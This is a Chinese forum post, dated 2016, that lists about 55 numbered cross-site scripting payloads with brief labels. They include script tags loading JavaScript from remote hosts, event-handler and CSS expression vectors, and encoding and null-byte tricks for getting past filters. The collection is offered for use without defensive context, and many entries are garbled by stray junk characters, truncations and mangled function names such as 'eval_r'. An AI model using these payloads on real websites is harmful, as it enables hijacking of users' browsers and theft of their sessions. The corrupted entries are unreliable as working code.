(1)普通的XSS JavaScript注入! h* f4 l! z* y. ^0 r
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> E7 R4 M- S h7 M
(99)另类弹框* }6 m# G7 B! V. {; Y) y
<q/oncut=alert()>1
: w8 E6 n0 O9 g0 b<s/onclick=alert()>b: D- P8 a7 n: ]$ u1 e& e( p% L$ P
<XSS=" onclick="alert(1)//">clickme</SSX=">
7 A7 K$ O! y) Y) Y, ? <zzz onclick=alert`1`>clickme</zzz>
) J( C. ~ T1 A- ]1 r5 C <a onclick=alert`1`>clickme</a>
$ F; {* f# w) T `<a=">clickme</a=">
' t- U4 F1 X% g: R9 v. o- }1 `<a=">clickme</a>, E$ E/ r% u+ B) J' M8 w- y8 I
<z=">clickme</z=">3 D. O6 h& @* Z* g2 `3 R: o
<z onclick=alert`1`>clickme</z>" O' N0 I9 c* i) S1 `3 ?) d
1 e) k h9 n4 l, N) u# m" y(2)IMG标签XSS使用JavaScript命令+ X- b# [ ^" L$ N# o6 L5 ~/ Z' t
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& c9 [! f9 I3 W+ I* k. o
) F" K7 W* t" |& S% F; t(3)IMG标签无分号无引号
7 C9 R6 b. n" N. G<IMG SRC=javascript:alert(‘XSS’)>
b4 H- W: Q5 ?( h1 {) u8 @' c1 i* o" L. X) R6 F
(4)IMG标签大小写不敏感* M3 r+ |* _8 |5 d3 G* a/ H, ?/ N) ]
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ R* F+ P+ `3 q! ?; V+ Y2 ?) j
8 T s6 z+ Z2 n
(5)HTML编码(必须有分号)
% [7 m$ k8 C# ]# L) D8 N<IMG SRC=javascript:alert(“XSS”)>
/ q6 G1 d/ P% r, d: y# t
& B$ d( @ c! Z. {/ s8 r) }# Q(6)修正缺陷IMG标签0 o F& Y" p4 ]% |
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>/ t* U6 @" L: h* ~+ `
6 `" ?. \; l& ]& M
(7)formCharCode标签(计算器)
2 B+ N6 J. D1 G; `" J$ O' _: u! p1 [<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
) S# Y( b1 w$ n+ b1 o" q$ a( R
# D# ~, [+ Z: k1 q# ?(8)UTF-8的Unicode编码(计算器): Z! V/ B" C( }) w* u" l
<IMG SRC=jav..省略..S')>4 d5 p. v$ k% b; B
+ T! Z1 y9 C; Z2 }/ n(9)7位的UTF-8的Unicode编码是没有分号的(计算器)1 ^" @- K7 N1 L0 p& R4 b
<IMG SRC=jav..省略..S')>
t6 Z8 |+ N2 _& B% B x6 f; z1 F/ K# ]1 e* Z: K* } z
(10)十六进制编码也是没有分号(计算器)
6 b, P4 w0 i; H! q1 W0 B<IMG SRC=\'#\'" /span>
+ E) g0 n" L& Q0 l
" A8 u+ f& I; M6 k(11)嵌入式标签,将Javascript分开
. f. P3 @$ O1 {<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 f: `& l, r+ v. ^& q$ S2 C, ?) p6 ~8 S
(12)嵌入式编码标签,将Javascript分开
0 K" h: ?* Z. a<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
* ~ N/ c8 O) e( y
$ p3 S4 ?) l2 ^( [6 S(13)嵌入式换行符
" U) H5 M) f) _; y; g* b" @<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, X# j- r; _5 \# \# s
8 t2 r% P0 ~, X+ v( |0 b
(14)嵌入式回车
# d: b: d6 J; X/ b9 A8 Y. b<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>; y9 R1 w' {, |' i5 G
9 u) m; W3 k4 L4 \0 P(15)嵌入式多行注入JavaScript,这是XSS极端的例子
( S J1 C9 i5 `( W! X/ y$ K/ r$ `<IMG SRC=\'#\'" /span>- `; i- l# V5 t& Y& Q# V8 L
! `3 p; s5 i- b! U, Q. K/ o, b* O) L# a(16)解决限制字符(要求同页面)
2 W7 u/ U3 |2 W8 r* E# S! w) T! s<script>z=’document.’</script>1 {4 s$ E7 x# A/ p2 m, C+ M
<script>z=z+’write(“‘</script>
) v: p& Y r5 m; Z<script>z=z+’<script’</script>
& X7 C, G6 ^( b! l. C<script>z=z+’ src=ht’</script>. d% C; @1 w9 Q8 o) t
<script>z=z+’tp://ww’</script>1 h" o: |" x+ n0 B% z) B& v4 \( Q
<script>z=z+’w.shell’</script>& z1 p( ]6 ]2 J: W
<script>z=z+’.net/1.’</script>
0 ]+ _. G, S" Y+ c: Q& |2 A, G* o<script>z=z+’js></sc’</script>
1 }' I- W# H6 {1 g6 B$ i/ R<script>z=z+’ript>”)’</script>/ v* U+ M) O) H/ J+ R; k$ D
<script>eval_r(z)</script>( q/ u, C3 v5 S- S: L, B: Z2 y# g6 k
) G3 w* p: m/ j* C0 v, }- H
(17)空字符
* x& j$ H; |" c2 I8 |perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out" r* z# Q6 V1 A( Y3 l3 V6 w* H4 I
' H2 P8 {! D; s' s5 X(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用7 J+ g8 x" L7 {( R
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 @6 a, R% N& |' k" \1 Z: [3 |$ ], S8 h
(19)Spaces和meta前的IMG标签9 U* ?% [1 J# Q* R
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
) i% {0 e: ]0 |8 d+ S% s. ~) }& ?* E2 y" c2 ]9 S, U) u8 Q: d
(20)Non-alpha-non-digit XSS O/ H3 Q. \. d. d0 q
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
# {& p5 Z O) O# d% t4 f9 s8 @+ c Y. Z
(21)Non-alpha-non-digit XSS to 29 [0 a* ]0 _/ _ M: z
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) n4 F$ D3 Y5 { `1 r
4 f0 T# w/ s- r
(22)Non-alpha-non-digit XSS to 3
; ^2 c7 Z6 G" ?5 t( K0 q+ C2 F0 s<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>! n, h/ J8 o: K. f8 {/ J& c# A
9 J% D/ H% L6 d/ Z2 ~
(23)双开括号
# x# H) X$ i' m# l0 i& v6 K6 f6 J9 a f<<SCRIPT>alert(“XSS”);//<</SCRIPT>. w+ m* ^ C- S5 h- |* Z2 j4 t* c
! C5 d8 P' V9 M. X- l! X% ? _1 ?7 B(24)无结束脚本标记(仅火狐等浏览器)
/ L9 F( O" Z+ l<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* |: ^( x+ c, g; S% ~3 H
) L$ L4 p0 w8 n! r1 f
(25)无结束脚本标记2
9 I6 O- c6 C& |; f# T$ S# s3 U<SCRIPT SRC=//3w.org/XSS/xss.js>1 L. n! O4 @& u5 q& R
) j6 W9 Q/ E4 @- U9 a: w. p% T; w
(26)半开的HTML/JavaScript XSS
9 u, R+ b2 J- }9 y8 E: `* B<IMG SRC=\'#\'" /span>; c6 z' g4 ~ b
* S8 m' X$ Y) h" f9 I! \. {7 d(27)双开角括号
& O0 J# K* ]( b, L! {<iframe src=http://3w.org/XSS.html <0 k- y3 L5 K- d9 ~
( a2 I% k# r$ _) {8 j O- H
(28)无单引号 双引号 分号
6 r& d3 z! t' L a<SCRIPT>a=/XSS/7 o+ C. @9 w" _& b3 J
alert(a.source)</SCRIPT>
( G& @, e: w- H1 j
& }8 u6 _- [9 Y& A/ F(29)换码过滤的JavaScript' E" t/ c+ ^3 U' q. B& Z0 ~
\”;alert(‘XSS’);//
: e5 @1 N: c9 A/ f i* u) s+ Z, R+ q/ d
(30)结束Title标签
* L! Z% \' X" i& g</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>" @8 _7 {' t9 `& a |: H5 A& z8 z1 ~
( k( B9 W n- |- U9 }; L" g
(31)Input Image/ c; y- X8 D( {+ x- M" M
<INPUT SRC=\'#\'" /span>7 y' o# d8 \4 ]: s8 u0 C
3 ]0 s0 e; m h
(32)BODY Image
$ n6 E& g3 t- O5 E& m% G<BODY BACKGROUND=”javascript:alert(‘XSS’)”>% l$ y1 U W7 u/ Q7 Y# |. ~, i
% Q& [3 D" S, m8 V: s(33)BODY标签/ d8 a( X. K& }+ m. U$ [/ O
<BODY(‘XSS’)>
U; I0 A# N n' C, w9 G) s3 S7 k& E
(34)IMG Dynsrc! q/ h! `3 P; N3 m$ }1 _- h
<IMG DYNSRC=\'#\'" /span> R' r) {1 v+ h, h* ]
% k N% T5 b. H. S5 m& U! b(35)IMG Lowsrc0 y8 }) w- k( a7 G4 k5 r
<IMG LOWSRC=\'#\'" /span>' g5 |1 @# x% W" P
/ W+ O9 R" q* }6 P) P1 d
(36)BGSOUND6 ^6 Y1 S% H4 s7 o/ g* E1 w
<BGSOUND SRC=\'#\'" /span>
/ p" M: b R: G8 h& c T& f3 n
. [( E" x4 d" v/ ^(37)STYLE sheet
+ D5 S' J1 q8 J<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> D; k( ?, {1 ]; a4 T( ~8 Y
" {* c% t0 y: d, ]! T% |9 N
(38)远程样式表+ Y7 Q. J; x) a0 ?& }0 Y* ?0 h
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
3 [/ ]7 R0 I& y4 R! G) s
7 x6 ?! H$ H0 X% g& }- [6 ~(39)List-style-image(列表式)8 S3 f" U' {' z/ E# l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% o. S+ E- m* z1 l( r
2 ~& a1 i, y& v r(40)IMG VBscript
4 B, B* \) @/ O* b5 Q' _<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
0 d# C$ b/ Z+ {+ Y7 Q
. O8 x' @) I5 O" _' V( Z3 Q* C3 ^(41)META链接url, B! R* h+ j, p1 g) j
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
3 T( n! s- H' W
2 P2 g$ i9 X0 w# o(42)Iframe
0 ~7 g% j. b9 h+ Z P4 n<IFRAME SRC=\'#\'" /IFRAME>
! [$ r" O9 ]% a# D7 R$ \) Q A
(43)Frame
' S+ Z7 ]% Z b2 w<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
! m ~' Q+ f$ X( E- u5 [6 ` q, T% K$ f9 R, c3 n& p) o: W
(44)Table
# i7 E( a& r& o9 e* _<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
2 t/ `' H; w( |5 I% W& [4 R5 _( {* @7 \
(45)TD( B) A+ c) Z T' I2 L6 x& k
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>& u; a: x2 l& S
- C+ ] z% U5 O- H8 W% Z7 y3 a(46)DIV background-image( M, e4 q5 `8 ^4 J. f- `: u
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! T7 c' Y' |/ S; y
, U5 j) F! {) s' ]4 N# [(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)) F9 m N4 j$ _, W% |" q
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>6 }* I4 n3 ]0 C* \1 u
) z" B+ G+ T1 w( \(48)DIV expression
) g' J V+ Y1 l) Z<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
: r X* G' ?9 x) c8 s
$ {9 S$ L, w1 H(49)STYLE属性分拆表达 |5 V& w ?" G5 Y
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>2 A6 a6 j; @2 e2 i5 P u* `
! w! g8 \# ?7 g a! {/ F(50)匿名STYLE(组成:开角号和一个字母开头)
0 u1 D1 o* N& {: E) t% g7 A3 u<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: ^" N* }: p; j" x0 |+ I' w9 Q3 S
( m9 O4 C5 S3 Z(51)STYLE background-image
' `% [: n9 H% N! _3 K( e<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>6 l0 K& ]2 H( |2 m; Z
+ e% ?5 f- w2 N
(52)IMG STYLE方式9 }" T6 f/ x9 g( i/ J+ U
exppression(alert(“XSS”))’>; `0 [* O( K0 U) C
- R4 H; h+ R [(53)STYLE background7 T! h0 f: @! Q9 N2 j+ j& M" L' o$ H
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>7 ?6 z5 o2 S8 A6 T5 A" R
: F4 j1 e1 D5 P' ~- n8 n(54)BASE
: b& s' W9 I; T S) i) \; `<BASE HREF=”javascript:alert(‘XSS’);//”>3 e3 N8 S1 Z' R# j9 c; P% l; g
) W5 S9 E1 S6 c5 t(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS$ y* ~2 j2 y& M6 \/ P
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
. d( x0 a/ V, v7 L. k |
发表于 2016-4-28 10:06:15
收藏
支持
反对